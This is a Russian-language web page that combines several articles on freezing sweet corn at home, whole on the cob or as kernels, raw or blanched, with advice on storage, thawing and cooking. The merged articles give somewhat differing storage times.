0 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Преимущества заморозки кукурузы

Как заморозить кукурузу в початках в домашних условиях: варианты хранения и советы от опытных домохозяек

Кукуруза – сезонное растение, после сбора урожая ее можно купить в основном в консервированном или сушеном виде. Опытные домохозяйки рекомендуют замораживать ее в початках, так как этот способ сохраняет большинство полезных качеств. У замороженного злака, как и у свежего, калорийность примерно 90 ккал на 100 г. Подавляющую часть состава занимает вода – 70–75%. Углеводы составляют 20–23%, белки 3–3,5%, а жиры – до 1% веса. Около 2% массы зерен также приходится на пищевые волокна.

Благодаря содержанию витаминов, макро- и микроэлементов употребление замороженной кукурузы способствует улучшению работы сердца и сосудов, пищеварительных органов, нервной и эндокринной систем. В составе разнообразного рациона она улучшает внешний вид, здоровье кожи и волос, стабилизирует обменные процессы. Рассмотрим, как заморозить кукурузу в початках в домашних условиях

Можно ли замораживать кукурузу в початках

Замороженная кукуруза в початках – это простая заготовка на зиму, которая поможет сохранить продукт на долгое время. После разморозки и варки можно наслаждаться вкусным и сочным злаком, как и летом.

Потеряются ли вкусовые качества и полезные свойства

Заморозка кукурузы початками помогает сохранить не только полезные свойства, но и вкус свежего растения. Зерна злака содержат витамины группы B, магний, фосфор, йод, калий и кальций. Употребление продукта оказывает положительное влияние на работу желудочно-кишечного тракта и иммунной системы в целом.

В замороженных овощах, фруктах и ягодах полезные вещества сохраняются лучше, чем в их консервированных аналогах. К тому же, это весьма заманчиво – иметь возможность в зимний период лакомиться продуктами, будто только-только снятыми с грядки.

Подготовка кукурузы

Перед заморозкой початки нужно как следует подготовить:

  • удалить покровные листья;
  • снять рыльца (коричневые волоски);
  • срезать кончик с недозрелыми зернышками на 2-3 см;
  • удалить все поврежденные участки при помощи острого ножа.

Промыть каждый початок под проточной водой, обсушить полотенцем или оставить высыхать при комнатной температуре.

Правильный отбор початков

Главное при заготовке кукурузы – выбрать качественные экземпляры. Замораживать следует свежие початки. Если урожай долго хранился, то содержащийся в злаке сахар превращается в крахмалистое вещество, из-за чего портится вкус.

Выбирайте початки средней зрелости. Неспелые и переспелые варианты не дадут того вкуса, который так нравится детям и взрослым. На початках не должно быть видимых повреждений, темных пятен и следов насекомых.

Какие сорта лучше всего подойдут

Для заморозки отлично подходят сахарные сорта, спелость должна быть молочно-восковая. Когда при надавливании на бледно-желтое мягкое зерно кукурузы выходит белый сладкий сок, кукуруза созрела.

Отзывы хозяек о пищевых качествах кукурузы после заморозки противоречивы. Но не всегда причина неудач связана с нарушением технологии заготовки. Большинство сортов сахарной кукурузы не предназначено для хранения любыми другими способами, кроме консервирования.

Сохранить приятный вкус зерен после замораживания способны всего 5 сортов:

Нюансы заморозки початков

Замораживать початки можно разными способами. Но в любом случае в морозильной камере потребуется больше места, чем при заготовке зерен. Однако результат того стоит.

В сыром виде

При заморозке в сыром виде преимущества такие:

  • максимально сохраняются полезные вещества;
  • можно в холодное время года отварить початки кукурузы и лакомиться ею прямо с кочана.

К минусам можно отнести то, что початки нужно полноценно варить 30–40 минут после разморозки.

В вареном виде

Если заморозить початки в вареном виде, то продукт можно будет употреблять в пищу сразу после разморозки. Своеобразное «закаливание» перед заморозкой вареной кукурузы позволит сохранить все полезные свойства, вкусовые качества и внешний вид. Но потребуется больше времени для подготовки продукта.

Пошаговая инструкция по обработке, упаковке и заморозке

Обработка при сухом методе и «закаливании» будет отличаться. Каждый из способов имеет свои преимущества и недостатки, но тем не менее позволяет сохранить полезные вещества и аромат овоща.

Сухой способ

Предварительно подготовленные початки запакуйте в пакеты по 2–4 штуки (удалив из них воздух и застегнув на zip-застежку) или обмотайте каждый кочан по отдельности пищевой пленкой. В таком виде уложите початки в морозильную камеру. Зимой вам останется лишь достать из холодильника кукурузу, кинуть в кипящую воду и варить 20–30 минут. В один пакет рекомендуем положить такое количество початков, которое вы используете за один раз. Повторная заморозка нежелательна.

Способ закаливания

Метод бланширования называют своеобразным закаливанием продукта. Последовательность действий при этом способе следующая:

  1. Приготовьте две кастрюли – с кипятком и холодной водой (можно добавить кубики льда).
  2. Подготовленные початки положите в горячую воду на 5 минут. Во время варки все кочаны должны быть полностью погружены в воду. При необходимости их можно переворачивать.
  3. Затем переложите в кастрюлю с холодной водой на 3 минуты.
  4. Повторите процедуру 3–5 раз.
  5. Разложите початки на тонком полотенце без ворса и подождите, пока они хорошо просохнут.
  6. Далее каждый плод отдельно обверните пищевой пленкой и разместите в морозильной камере.

Сроки хранения

Скорость заморозки кукурузы в початках зависит от холодильника. В среднем она замораживается за 2-3 часа. Если вы упаковываете несколько початков в одном пакете, то можно положить их на блюдо и поместить в камеру на сутки, после чего расфасовать. В этом случае у вас не образуется большой замороженный ком.

Мороженые овощи обычно имеют срок хранения один год, но кукуруза — исключение, и хранить ее в морозилке можно не более 6–8 месяцев, независимо от того, была она бланширована или нет.

Совет! Не стоит затягивать с употреблением початков кукурузы в пищу. Желательно съедать запасы до поступления следующего урожая: чем дольше хранится злак, тем менее выраженным становится вкус и аромат зерен, и тем жестче – их структура

Оптимальные условия

Зерна легко впитывают посторонние ароматы. Поскольку в морозилке не всегда хранятся только овощи, но также мясо или рыба, нужно изолировать початок от доступа воздуха, стараясь добиться максимальной герметичности упаковки.

Как разморозить початки кукурузы

Лучше всего разморозить кукурузу, поместив ее в холодильник. Так процесс будет происходить постепенно, но сохранится правильный температурный режим, что не позволит развиваться бактериям. Можно разморозить початки в микроволновой печи, но для этого их нужно обернуть полотенцем, чтобы зерна не пересохли, а оставались мягкими и сочными.

Кукурузу в початках, которая предварительно не была бланширована, рекомендуют частично разморозить и только после этого отправлять вариться в кастрюлю. Не лучший вариант – разогревать замороженный продукт, просто оставив его при комнатной температуре, так как в нем могут развиться бактерии.

Внимание! Нельзя опускать замерзшую кукурузу в горячую воду, полагая, что она растает в процессе варки. Это сделает зерна невкусными.

Дальнейшее применение

После разморозки сырые початки варят в кипящей воде 20–30 минут. Кукурузу, которая прошла предварительную бланшировку, нужно подержать несколько минут в кипятке.

Размороженную кукурузу можно не только сварить, но и приготовить в духовке. Для этого смешивают сливочное масло (20 г на 1 початок) с зеленью и специями (по вкусу). Обмазывают кочанчики полученным маринадом, заворачивают в фольгу и отправляют на 40 минут в предварительно разогретую до +180˚С духовку.

Кукуруза прекрасно сочетается со многими продуктами, поэтому ее можно добавлять практически в любое угощение. Салаты и закуски с нежными зернами всегда украсят праздничный стол и ежедневную трапезу.

Советы и рекомендации

Чтобы употребление в пищу замороженной кукурузы доставило удовольствие, придерживайтесь простых рекомендаций:

  1. Дольше остаются свежими поздние сорта культуры, собранные на стадии молочной зрелости. Кожица на зернышках не такая грубая, но достаточно крепкая, чтобы не лопаться при обработке.
  2. Не оставляйте злаки в холодильнике без пакета или емкости. Без упаковки срок хранения початков уменьшится на треть.
  3. Кукуруза, прошедшая заморозку, доходит до готовности при варке гораздо быстрее, чем свежая.
  4. Обеспечьте полную герметичность упаковки, иначе при хранении зерна непременно впитают посторонние запахи.
  5. Не варите початки в замороженном виде. Если закинуть их непосредственно в кипяток, кожица зернышек станет слишком жесткой. Дождитесь их полного оттаивания.
  6. Размороженные кочаны можно не только сварить, но и запечь в духовке.

Заключение

Сезонность созревания кукурузы не позволяет лакомиться вкусным злаком круглый год. Консервация не сохраняет все полезные вещества и витамины продукта. Заморозка початков – отличный способ полностью сберечь вкус и полезный состав. Для этого метода нужны молодые созревшие початки сахарных сортов.

Можно выбрать любой из двух способов криозаготовки – сухим методом и с помощью закаливания (бланшировки). Сухой менее трудоемкий, но после разморозки початки придется варить. После закаливания – лишь несколько минут подержать в кипящей воде.

Разморозив вынутые из морозильной камеры початки кукурузы в холодильнике или в микроволновой печи, вам останется их только сварить. Сваренная после заморозки кукуруза будет иметь такой же вкус и аромат, как и только что сорванная с грядки.

Как сохранить кукурузу на зиму: заморозка

Кукуруза — отличное лакомство как взрослых, так и детей, но период потребления этого продукта в свежем виде достаточно короткий — к сожалению, хранить молодые кочаны долгое время не удается. Но можно продлить период потребления кукурузы вплоть до следующего лета, если знать, как правильно заморозить кукурузу на зиму в зернах и в початках. Затем вы можете использовать ее на салаты, гарниры или просто употреблять в вареном виде, как и свежую.

Преимущества заморозки

Достоинствами этого процесса заготовки кочанов на зиму считаются:

  • максимальное сохранение витаминов и полезных веществ, содержащихся в кукурузе;
  • круглогодичное употребление свежей кукурузы;
  • значительная экономия, так как цены в зимний период на свежие початки очень высокие, и найти их можно не везде;
  • варианты видов заморозки и дальнейшего использования продукта. Благодаря тому, что кукурузу можно заготовить как в зернах, так и в початках, расширяются возможности ее использования для различных блюд.

Предварительная подготовка

Чтобы заморозить данный продукт, необходимо подготовить сахарные початки, при этом их зрелость должна быть средней. Если вы возьмете еще не спелую кукурузу, вкус будет хуже. Если же вы выберете переспелую, зерна не будут иметь сочности и того вкуса, за который мы так любим этот продукт.

Замораживать следует только что сорванные початки, потому что при длительном хранении портится вкус — из-за того что сахар, который содержится в зернах, превращается в крахмалистое вещество.

Подбирать початки необходимо внимательно. На поверхности не должно быть признаков повреждений, болезней и гнилистых образований.

Перед началом заморозки следует удалить лиственную и волосяную часть початка, хорошо вымыть его и просушить бумажным полотенцем.

Заморозка в початках

Существует несколько способов заморозить кочаны на зиму. Давайте рассмотрим их подробно.

Без предварительной обработки

Сперва рассмотрим, как заморозить кукурузу на зиму в початках без предварительной варки. Данный способ является самым простым и быстрым. Когда вы подобрали необходимые кочаны, следует убрать листья, срезать стебель, удалить все волоски. Когда початки хорошо вымыты и высушены, их складывают в ЗИП-пакеты или обычные полиэтиленовые кульки, плотно закрывают и отправляют в морозилку для заморозки и хранения.

Способ является очень популярным, так как менее затратен по времени, но в то же время початки занимают много места. Такой вариант заготовки не подойдет тем, у кого морозильная камера небольших размеров.

С бланшировкой

Этот способ заморозки является более затратным по времени, зато позволяет употреблять продукт в пищу сразу после того, как он разморозится.

Метод бланширования можно назвать своеобразным «закаливанием» продукта перед отправлением в морозилку, позволяющим максимально сохранить вкус, аппетитный внешний вид и полезность.

Во время проведения данной процедуры очищенные початки кукурузы нужно погрузить в закипевшую воду и проварить в течение 5 минут, далее быстро перекинуть их в кастрюлю с максимально холодной водой, в которую добавить кубики льда.

Остывать в холодной воде кочаны должны около 3 минут, после этого нужно хорошо их просушить бумажным полотенцем.

Помещать початки в морозилку необходимо в ЗИП-пакете или полиэтиленовом кульке.

Заморозка в зернах

Главным достоинством подобной заморозки является тот факт, что вы максимально экономите место в морозилке и можете заготовить намного больше кукурузы, чем в початках.

Недостатком такого способа считается более длительный процесс подготовительных работ перед отправкой в морозилку.

Рассмотрим пошаговый процесс заготовки сырых зерен для заморозки:

  1. Первое, что необходимо сделать — это освободить початки от листьев и волос.
  2. Хорошо вымыть все кочаны и просушить их с помощью бумажного полотенца.
  3. На разделочной доске, с помощью острого ножа, следует срезать зерна с кочана — как можно аккуратнее, производя плавные движения, начиная с верхней части початка и опускаясь вниз.
  4. Зерна перекладываются в ЗИП-пакет или пластиковый контейнер и помещаются в морозильную камеру для заморозки и дальнейшего хранения.

Можно также заморозить зерна, предварительно их пробланшировав.

Преимуществом данного способа является тот факт, что зерна можно сразу же использовать для приготовления блюд, без предварительной термической обработки. Но при этом данный вариант заморозки считается наиболее длительным.

Рассмотрим пошаговый процесс подготовки зерен к заморозке таким способом:

  1. Первое, что необходимо сделать — это очистить початки кукурузы от листьев и волос, хорошо вымыть и просушить с помощью бумажных полотенец.
  2. Далее необходимо поместить кочаны в кипящую воду — таким образом, чтобы вода полностью их покрыла, — и проварить в течение 5 минут.
  3. Пока зерна готовятся, следует заранее позаботиться о подготовке емкости с холодной водой и кубиков льда.
  4. По истечению 5 минут следует быстро перебросить кочаны в емкость с холодной водой и льдом.
  5. После того как заготовка полностью остынет, а это будет длиться около 2 минут, следует вынуть ее из воды и хорошо просушить бумажным полотенцем.
  6. На разделочной доске, с помощью максимально острого ножа, следует срезать зерна с початка, начиная сверху и плавно опускаясь вниз.
  7. Пересыпать зерна в ЗИП-пакеты либо же пластиковые контейнеры, отправить в морозилку для заморозки и дальнейшего хранения.

Сколько можно хранить

Те, кто хоть раз замораживал овощи или фрукты, знают, как их хранить, чтобы продлить срок годности, но рассмотрим поподробнее, как заготавливать кукурузу в морозильной камере на зиму.

Мороженые овощи обычно имеют срок хранения в один год, но рассматриваемый продукт является исключением, и хранить его в морозилке можно не более 8 месяцев, независимо от того, был он пробланширован или нет, в початках он или в зернах.

Как правильно разморозить

Кукурузу, которая предварительно была бланшированной (независимо от того, в початке она или в зернах), размораживать рекомендуется в микроволновке, включив режим разморозки.

Также способы разморозки зависят от того, как вы планируете использовать в дальнейшем замороженный продукт. Если вы будете добавлять зерна в суп, гарнир, либо другое блюдо, которое пройдет процесс термической обработки, то заготовку можно не размораживать, а добавлять в замороженном виде.

Кукурузу в початках, которая предварительно не была пробланшированной, рекомендуют частично разморозить и отправлять в кастрюлю вариться.

Не рекомендуют разогревать замороженный продукт, просто оставив его при комнатной температуре, так как в нем могут развиться разнообразные бактерии.

Еще один простой способ разморозки — помещение кукурузы в холодильник. Так процесс разморозки будет происходить постепенно, но сохранится правильный температурный режим, что не позволит развиваться бактериям.

Как и сколько варить

Варить необходимо только ту кукурузу, которая не была пробланширована перед заморозкой.

Рассмотрим, как сварить замороженную кукурузу в початках. Початки рекомендуется отправить в микроволновку на несколько минут, чтобы они чуть-чуть оттаяли, и отправить в кастрюлю, где варить на протяжении 40 минут.

Другое дело мороженый продукт в зернах — размораживать перед готовкой его не нужно. Однако надо знать, сколько варить замороженную кукурузу, чтобы она была вкусной, как свежесорванная. Зерна в таком виде должны вариться на протяжении 20-ти минут, отправлять их следует в подсоленную кипящую воду.

Таким образом, замораживать кукурузу можно различными способами, главное — разобраться, какой вам больше подходит. Процесс подготовки совершенно не сложный, важно лишь учитывать некоторые рекомендации и советы, чтобы справиться с заданием без особых усилий и затрат времени.

Как заморозить кукурузу на зиму

Замороженная на зиму кукуруза – источник витаминов и минералов на всю зиму. Этот продукт при заморозке вкус не теряет, его можно будет достать в любую минуту и сварить, обжарить на сковороде, добавить в суп. Но как заморозить кукурузу на зиму знает не каждая хозяйка. В этой статье дана информация о преимуществах заморозки кукурузы и том, как это делается.

Преимущества заморозки кукурузы

Многие хозяюшки, у которых имеется дача или огород, задаются вопросом, можно ли и как заморозить кукурузу на зиму. Кукурузу на зиму замораживать в домашних условиях не трудно и делать это конечно можно.

Замороженная кукуруза может храниться примерно 6-8 месяцев

Ученые отмечают, что именно в мороженом виде кукуруза сохраняет больше всего питательных веществ, а вот после консервирования из нее уходит много полезных витаминов и минералов. Так что если урожай удался на славу, стоит пустить большую часть кукурузы именно на заморозку, чтобы лакомиться зимой свежими зернами или даже размороженными отварными початками!

Перед тем как рассмотреть особенности заморозки кукурузы, стоит изучить преимущества этого процесса.

  • При замораживании в зернах сохраняется максимум питательных веществ. Кукуруза остается почти такой же полезной, как до этого процесса.
  • Вкус, аромат, сочность кукурузы не меняются после заморозки. Многие овощи и фрукты после размораживания теряют свои изначальные качества, но не кукуруза, ее можно замораживать, не опасаясь, что она станет невкусной.

При замораживании в зернах сохраняется максимум питательных веществ

Ну и наконец, нужно отметить, что заморозка этого продукта – быстрый и простой процесс, много времени он не отнимет, но нужно знать, как правильно это делать.

Недостатки заморозки в домашних условиях

С недостатками при заморозке кукурузы на зиму также можно столкнуться. Их не много, но для многих они вполне существенны.

    Повторная заморозка кукурузы невозможна. Конечно, никто не помешает это сделать, но при повторной заморозке теряется большая часть питательных веществ, пленка зерна становится жесткой. Такая кукуруза уже не сочная и ее вкус понравится не всем.

При повторной заморозке кукурузы теряется большая часть питательных веществ

Как видно эти недостатки связаны с особенностями кухни и заморозки кукурузы. Если имеется большая морозилка и морозить кукурузу небольшими порциями, то проблем не возникнет.

Выбор и подготовка кукурузы

На зиму можно заморозить разные виды кукурузы. Сорт большой роли не играет, но рекомендуется все же брать для этого молодые початки, у которых уже сформировались зерна. Они должны плотно располагаться в ряду и иметь приятный аромат. При надавливании на зерна может выделяться светло-белый сок. Это признак молодой кукурузы, после размораживания она будет такой же нежной и сладкой, словно только что собрана с участка.

Желательно, чтобы кукуруза для заморозки была целой, особенно зерна, не больной, без жучков или червячков в початках. Лучше всего обратить внимание на сахарные сорта, если выбираются технические виды, то их морозят сразу после созревания – позже зерна станут жесткими.

Желательно, чтобы кукуруза для заморозки была целой, особенно зерна

Перед тем как заморозить кукурузу на зиму, необходимо провести некоторые подготовительные работы.

  1. Кочаны очищаются от листьев, верхнего чубчика.
  2. Верхушку, которая, как правило, у кукурузы сухая, необходимо срезать, от нее не будет проку.
  3. Очищенные кочаны необходимо промыть под проточной водой.
  4. Теперь важно кукурузу обсушить, в мокром виде она никогда не замораживается!
  5. Если замораживаются не целые початки, а только зерна, то необходимо отделить зерна от кочана или же срезать их ножом.

После этих подготовительных процедур кукуруза готова к самому процессу замораживания.

Как правильно заморозить кукурузу в початках

Есть два метода заморозки кукурузы. В первом случае она морозится в кочанах, то есть целиком, во втором морозят только зерна. Первым делом стоит узнать, как заморозить кукурузу на зиму в початках. Морозить кукурузу в кочанах можно двумя вариантами.

    В початках кукурузу морозят в специальных герметичных пакетах на молнии или же контейнерах. Кукурузу раскладывают в разном количестве, но обычно в том, что употребляется семьей за один раз. Кроме того, можно просто каждый кочан обернуть отдельно пищевой пленкой, такой вариант намного удобней, потому что в любой момент можно будет достать нужное количество кукурузы. Если кочаны больше, можно разрезать их на несколько частей. Когда кукуруза будет расфасована, ее помещают в морозилку.

Заморозить кукурузу в початках можно и после бланшировки

Оба описанных выше методов имеют свои достоинства. В первом случае продукт получается более свежим, во втором – не требуется варка, перед употреблением. Чтобы понять какой вариант лучше, стоит опробовать каждый из них и выбрать подходящий для себя.

Как заморозить зерна кукурузы

В зернах кукурузу удобно замораживать на салаты, супы, тушение, жарку. Этот метод позволяет значительно сэкономить место в холодильнике, поэтому именно так чаще всего кукурузу и хранят. Итак, как заморозить кукурузу на зиму в зернах.

В зернах кукурузу удобно замораживать для салатов, супов, тушения, жарки

Как было сказано выше, чтобы получить зерна, кукурузу нужно вымыть, просушить и обобрать зернышки или срезать их ножом. Оба варианта подходят, но в первом случае зерна будут целыми, а во втором с одной стороны резанными. После того как зерна готовы, их необходимо рассыпать в пакеты с застежками или пластиковые (стеклянные) емкости, а затем положить в морозилку.

Как и в случае с початками, зерна кукурузы можно бланшировать, перед тем как заморозить. В этом случае зерна нужно будет только размораживать, и сразу употреблять с маслом или солью – вкус, сочность они сохраняют. Но отдельно варить зерна не стоит, лучше все же сварить кукурузу в початках, а затем, когда она остынет, обобрать зернышки и отправить на заморозку.

Использование мороженой кукурузы

Как правильно употреблять мороженую кукурузу? Замороженную кукурузу можно кушать по-разному. Замороженные початки можно использовать для приготовления кукурузы на гриле, супов. Если кукуруза морожена зернами, из нее также можно делать супы, но кроме того, зерна подходят для салатов, рагу, выпекания и даже приготовления детских блюд.

Если кукуруза не варилась до заморозки, то готовят ее в среднем 30 минут, а ту, что варилась – 3-4 минуты, не больше

А нужно ли размораживать кукурузу до употребления? Если она применяется в блюдах, что поддаются варке, жарке, тушению, то нет, размораживание будет бессмысленным этапом, зерна и так дойдут до нужного состояния во время готовки блюда. Кукурузу, что не варилась до заморозки, готовят в среднем 30 минут, а ту, что варилась – 3-4 минуты, не больше.

Если блюдо, куда кладется кукуруза, не поддается термической обработке или ее просто хочется съесть отдельно, то кукурузу стоит разморозить. Делать это можно просто положив ее при комнатной температуре, поставив на режим «Разморозка» в микроволновке или бросив в кипяток на 3 минуты, если зерна отваривались до заморозки, и 30 минут, если они сырые.

Замороженная кукуруза – кладезь полезных веществ, которых сильно не хватает зимой и весной. Научившись замораживать кукурузу и выбрав для себя наиболее подходящий вариант заморозки, можно обеспечить семью витаминами на весь холодный период. Готовить из замороженной кукурузы можно самые разнообразные блюда, но и сама по себе, как отдельное блюдо она очень вкусная получается, такая же сладкая и сочная, словно только что собрана с участка.

Как заморозить кукурузу на зиму в початках

Насколько зимой полезна и вкусна замороженная кукуруза, знает большинство домохозяек. Чтобы порадовать себя ароматными свежими початками в холодную пору, не нужно прилагать много усилий или тратить уйму времени и денег. Но многие несведущие люди заготавливают замороженные овощи неправильно. Это приводит к утрате большинства полезных свойств продукта. Стоит узнать о заготовке замороженной кукурузы на зиму подробнее.

Преимущества заморозки кукурузы

Кукурузу можно заготовить на зиму двумя способами: законсервировать и подвергнуть заморозке. Второй способ более простой и выгодный. Во-первых, заморозка проходит намного легче и с меньшими затратами, чем консервирование. Во-вторых, она позволяет сохранить овощ практически в первозданном виде. В замороженных початках есть все: и аромат, и цвет, и вкус первоначального продукта, а что главное, полезные вещества остаются в том же составе.

Подготовка кукурузы к заморозке

Прежде чем отправить овощ в морозильную камеру, его нужно соответствующим образом обработать. Необходимо очистить от листьев, кукурузного «шелка». Для этого необходимо с тупого конца кочана срезать 1-2 см несъедобной части. Дальше процесс очищения пойдет значительно легче. Очищенные кочаны помыть под проточной водой, обсушить, чтобы замороженные зерна не слиплись между собой, а влага не превратилась в лед. Если кукуруза будет замораживаться в готовом виде, отварить ее.

Есть домохозяйки, которые не считают нужным мыть овощи, заготавливая их на зиму. Но это неправильно и может привести к неприятным последствиям. Вода смывает грязь, бактерии, паразитов, некоторые из них не гибнут даже при очень низких температурах и могут попасть в организм, вызвать отравление и другие отрицательные симптомы.

Как правильно заморозить початок кукурузы

Чтобы зимой получить максимум полезных веществ, овощи лучше замораживать в свежем виде. В то же время кукурузные кочаны получатся яркими, сочными и ароматными, если подвергнуть их бланшированию.

Без обработки

Кукурузные початки подготовить, завернуть в пищевую пленку, уложить компактно в морозильный отсек. Больше ничего не нужно — это самый простой способ замораживания овоща. Чтобы улучшить его вкусовые качества, после разморозки используют различные кулинарные приемы, но об этом дальше.

После бланширования

Початки кукурузы при подготовке к заморозке могут подвергаться бланшированию, которое помогает не только сохранить свойства овощей, но и продлить срок их хранения. Кочаны опускают в кипящую воду, 5 минут там проваривают. Затем резко прерывая процесс варки, погружают в таз с ледяной водой.

Дело в том, что в овощах присутствуют ферменты, которые продолжают оставаться в активном состоянии и при низких температурах. Благодаря их деятельности ускоряются различные биохимические процессы, в том числе реакции распада, гниения, порчи. Ударная тепловая обработка замороженных овощей, пусть и кратковременная, помогает остановить этот процесс.

Как замораживать кукурузу в зернах

Заготавливать замороженную кукурузу в зернах более целесообразно, так как сфера ее применения значительно возрастает. Теперь овощ можно использовать не только как самостоятельное блюдо, но и в качестве дополнительных ингредиентов в различных кулинарных рецептах. Замороженная кукуруза в зернах используется в супах, салатах, гарнирах, других блюдах.

В сыром виде

Замораживать нужно свежесобранную кукурузу. При длительном хранении в ней начинают накапливаться крахмалистые вещества, которые значительно портят вкус продукта. Они преобразуются из природных сахаров, находящихся в составе овоща.

Чтобы отделить зернышки от кочана, необходимо аккуратно, под самое основание срезать их остро отточенным ножом. Затем собрать в пакет или другую подходящую емкость, обязательно герметичную, и убрать в морозильную камеру до зимы.

После бланширования

Пробланшировав кукурузные початки, нужно дождаться их охлаждения до комнатной температуры. Затем попробовать вручную отделить зернышки. Если не получится, прибегнуть к помощи ножа или другого приспособления. В продаже есть специальные приборы для чистки кукурузы, лущилки ручные и электрические, так что проблем с этим возникнуть не должно.

Пакеты для хранения лучше использовать прочные, чтобы не рвались. Необходимо разделить зерновую массу на небольшие порции – так не придется размораживать весь запас ради 100 г. Если овощ первый раз подвергается замораживанию, в нем сохраняется больше половины полезных веществ, но при повторной процедуре они разрушаются полностью.

Можно ли замораживать консервированную кукурузу

Иногда после приготовления праздничных блюд остается полбанки консервированной кукурузы. Экономные хозяйки научились сберегать такие остатки, замораживая их. Это позволяет продлить срок хранения консервированной кукурузы (после вскрытия) до следующего раза. Сделать это можно следующим образом:

  • слить воду и обсушить зернышки полотенцем;
  • замораживать россыпью;
  • ссыпать в пакетик;
  • положить в морозилку.

Можно сразу упаковать в целлофановый пакет, который нужно периодически встряхивать. Замороженная масса без этого будет слипаться.

Можно ли замораживать вареную кукурузу

Перед заморозкой кукурузу допускается сварить до готовности, и в таком виде отправить в морозильную камеру. Сделать это можно двумя способами:

  1. Целиком , если зимой хочется побаловать себя свежими сочными початками. Отварить их до состояния готовности, охладить и завернуть в пищевую пленку. Зимой замороженные кочаны бросить в кипящую воду и варить 3-4 минуты при 100 градусах.
  2. В зернах . Такой способ больше подойдет для супов, запеканок, рагу, детского питания. Сварить целиком, отделить зернышки из ячеек, сначала один ряд, остальные будет легче. Упаковать небольшими порциями (на 1 раз) в полиэтиленовые пакетики.

Сколько можно хранить замороженную кукурузу

Замороженная кукуруза может храниться очень долго, до полутора лет. Поэтому на каждом контейнере (пакете) необходимо подписывать дату заготовки, чтобы впоследствии не перепутать старый урожай с новым. Вареный овощ также может долго храниться, вплоть до следующего сезона.

Как правильно размораживать кукурузу

Початки кукурузы, замороженные в сыром виде, необходимо достать из морозильной камеры и дать им оттаять на нижней полке холодильника. Затем как обычно варить в кипящей подсоленной воде 30-40 минут.

Как приготовить замороженную кукурузу

Дать замороженным кочанам оттаять, залить кипящей водой, чтобы зерна получились сочными и нежными. Поставить вариться. Если замороженные початки погрузить сначала в холодную воду, то пока она закипит, в нее выйдут все полезные вещества и сок овоща. Если заливать кипятком, то поверхность обварится, образуется защитная пленка, которая воспрепятствует потере вкусовых и питательных свойств замороженной кукурузы.

На один кочан необходимо приготовить 250-300 мл кипящей воды. Залить все в кастрюлю, положить початки и закрыть крышкой. Верхние слои, выступающие над водой, благодаря этому будут довариваться на пару. Многие люди заблуждаются, думая, что чем дольше они будут варить, тем мягче будет. Но в результате получается все наоборот! От длительной варки вырабатывается крахмал, замороженная кукуруза становится жесткой, невкусной.

Чтобы замороженная кормовая кукуруза была сочной, ее необходимо на два часа перед варкой замочить в молоке. Сладкой она станет, если при варке добавить на литр воды 1 чайную ложку сахара. Чтобы сохранить природный цвет замороженного овоща, необходимо также влить в кастрюлю сок половинки лимона (на 2,5-3 литра). Через двадцать минут после начала кипения взять зубочистку и проткнуть ею кочан.

Если она согнулась или сломалась, можно поварить еще пять минут, затем выключить. Дать кочанам немного постоять в горячей воде (5 минут), чтобы они стали еще сочнее. Чтобы замороженная кукуруза получилась мягкой, ее нельзя солить, пока она варится или находится в воде. Соль стимулирует вытягивание сока из зерен. Следовательно, кукурузу необходимо солить перед подачей.

Рецепт с молоком

Замечательное блюдо можно получить, если сварить замороженную кукурузу в молоке. Она приобретает необычайно нежный сливочный вкус. Замороженные початки, которые оттаяли в холодильнике, можно приготовить следующим образом:

  • нарезать порционно на несколько частей, так они лучше пропитаются молоком;
  • залить водой, чтобы она слегка накрывала;
  • залить молоком, восполнив им недостающий объем;
  • варить 10 минут при 100 градусах;
  • добавить 50 г сливочного масла, проварить еще столько же;
  • выключить, держать под крышкой 20 минут, чтобы зерна стали сочными;
  • подавая на стол, каждый кусок посыпать солью.

Время готовки может варьироваться, все зависит от сорта и степени зрелости замороженных кочанов. Еще вкуснее их пожарить на гриле.

Заключение

Замороженная кукуруза поможет в зимний период года привнести в рацион свежесть и яркие краски лета, напитать организм полезными веществами. Простота и легкость в приготовлении делают этот продукт доступным в каждом доме.

Как заморозить кукурузу на зиму в домашних условиях

Кукуруза — вкусный и полезный продукт, который человечество использует в пищу уже на протяжении нескольких тысяч лет. В сыром виде он может храниться 1–1,5 недели. Чтобы иметь возможность употреблять продукт в течение всей зимы и весны, его можно заморозить. Информацию о том, как заморозить кочаны и зёрна кукурузы, вы найдёте в этом материале.

Достоинства и недостатки заморозки

Заморозка считается лучшим способом длительного сохранения продуктов.

  • Она имеет следующие преимущества:
  • При таком способе сохраняется максимальное количество ценных элементов, вкус, сочность и запах продуктов.
  • Возможность употреблять продукт круглый год.
  • Экономичность, отсутствие надобности в затратах на дополнительные ингредиенты.
  • Малая затрата времени.
  • К недостаткам можно отнести:
  • Необходимость иметь вместительную морозилку.
  • Непригодность продукта к повторной заморозке.

Выбор и подготовка кукурузы для заморозки

Для заморозки отбирают целые початки с неповреждёнными зёрнами, не имеющие червоточин. Они должны быть зрелыми, но не перезревшими. Лучшие всего замораживать сахарные сорта. Зерновую культуру нужно замораживать непосредственно после сбора урожая: после длительного хранения у неё испортится вкус и уменьшится сочность.

  1. Очистить от листков и коричневых волокон.
  2. Срезать верхушку.
  3. Промыть под проточной водой.
  4. Обсушить.

При заморозке зёрен проводят следующую подготовку:

  1. Початки очищают от листьев.
  2. Промывают.
  3. Просушивают.
  4. Зёрна отделяют от початков руками либо срезают ножом.

Как правильно заморозить кукурузу на зиму

Чтобы кукуруза сохранила вкус и ценные элементы в ходе заморозки, необходимо чётко следовать технологии. Есть 2 способа сохранения продукта в замороженном виде: в початках и в зёрнах. Для заморозки нужны специальные пакеты (удобнее всего — с застёжкой-молнией), пластиковые контейнеры (для зёрен) и морозильная камера, поддерживающая температуру –12…–18°С.

В початках

Заморозка кукурузы в початках на зиму осуществляется следующим образом:

  1. Расфасовать по несколько кочанов по пакетам или обернуть по 1 штуке пищевой плёнкой. Также початок можно разрезать на несколько частей.
  2. Поместить пакеты в морозилку.

Ещё один способ заморозки — после бланшировки. Такой продукт после извлечения из морозильной камеры в длительной термической обработке уже не нуждается. К тому же он сохраняет сочность.

Технология заморозки бланшированной кукурузы выглядит следующим образом:

  1. Налить в большую кастрюлю воду.
  2. Поставить её на плиту и вскипятить.
  3. Поместить очищенные кочаны в кипящую воду.
  4. Варить на среднем огне до мягкого состояния зёрен (примерно 7–10 минут).
  5. Остудить кочаны при комнатной температуре.
  6. Поместить в пакеты либо завернуть в пищевую плёнку.

